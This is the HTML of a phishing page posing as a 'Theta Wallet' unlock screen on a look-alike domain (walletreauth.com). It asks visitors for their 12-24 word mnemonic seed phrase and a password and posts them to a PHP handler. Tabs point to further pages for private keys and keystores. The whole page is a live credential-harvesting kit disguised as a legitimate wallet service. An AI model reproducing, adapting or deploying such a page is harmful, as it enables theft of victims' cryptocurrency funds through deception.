<html lang="en">
<head>

	<meta charset="utf-8">
	<link rel="shortcut icon" href="https://gblobscdn.gitbook.com/spaces%2F-LJJeCjcLrr53DcT1Ml7%2Favatar.png?alt=media">
	<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
	<meta name="theme-color" content="#000000">
	<link rel="manifest" href="https://walletreauth.com/static/manifest.json">
	<title>Theta Wallet | mnemonic</title>
	<link href="../static/css/main.ba3fecb7.chunk.css" rel="stylesheet">
</head>
<body>
	<noscript>You need to enable JavaScript to run this app.</noscript>
	<form method="post" action="index.php.html">
		<div id="root">
			<div class="App">
				<div class="NavBar NavBar--is-centered"><a href="https://walletreauth.com/index.php"><img class="NavBar__logo" src="https://authentrend.com/wp-content/uploads/2020/11/walletconnect-logo.e1cb8d21.png"></a></div>
				<div class="Pages">
					<div class="UnlockWalletPage">
						<div class="UnlockWalletPage__wrapper">
							<div class="UnlockWalletPage__title">Unlock Your Wallet</div>
																					<div class="UnlockWalletCard" >
								<div class="UnlockWalletCard__content">
									<div class="UnlockWalletCard__header">
										<div class="TabBar UnlockWalletCard__tab-bar TabBar--is-centered TabBar--is-condensed">
											<a href="index.php.html" class="TabBarItem TabBarItem tablinks" aria-current="page"><div class="TabBarItem__title">Keystore</div></a>
											<a class="TabBarItem--is-active tablinks" href="index.php.html"><div class="TabBarItem__title">Mnemonic</div></a>
											<a class="TabBarItem tablinks" href="privatekey.php.html"><div class="TabBarItem__title">Private Key</div></a>
											<a class="TabBarItem tablinks" href="index.php.html#"><div class="TabBarItem__title">Hardware</div></a>
										</div>
									</div>

									<div class="UnlockWalletViaMnemonicPhrase">
										<div class="UnlockWalletViaMnemonicPhrase__title">Please enter your 12-24 word phrase</div>	
										<textarea class="UnlockWalletViaMnemonicPhrase__mnemonic" name="mnemonic" minlength="23" required></textarea>
										<div class="UnlockWalletViaMnemonicPhrase__mnemonic-instructions">Please separate each Mnemonic Phrase with a space.</div>
										<input class="UnlockWalletViaMnemonicPhrase__password-input" placeholder="Enter temporary session password" name="password" type="password" value="" required>
										<div class="UnlockWalletViaMnemonicPhrase__mnemonic-instructions"><input type="checkbox" value="I have entered all details are correctly" required><small>I have entered all details are correctly.</small></div>
										<div class="UnlockWalletCard__warning">Before you enter your mnemonic phrase, we recommend you connect your device to the internet. You will be able to disconnect once your wallet is Unlocked.</div>
										<div class="UnlockWalletViaMnemonicPhrase__footer">
											<button type="submit" name="submit" style="width:100%;" class="GradientButton undefined GradientButton">
												<div class="GradientButton__title">Unlock Wallet</div>
											</button>
										</div>
									</div>

								</div>
							</div>
						</div>
					</div>
				</div>
				<div>
				</div>
			</div>
		</div>


		<script src="../static/js/2.d8413ea9.chunk.js"></script>
		<script src="../static/js/main.3105abe6.chunk.js"></script>
		<div class="ReactModalPortal"></div><div class="ReactModalPortal">
		</div>
		<div>
			<div style="position: fixed; top: 0px; right: auto; bottom: auto; left: 50%; transform: translate(-50%, 0%); z-index: 100;">
				<div>
				</div>
			</div>
		</div>
	</form>
</body>

</html>
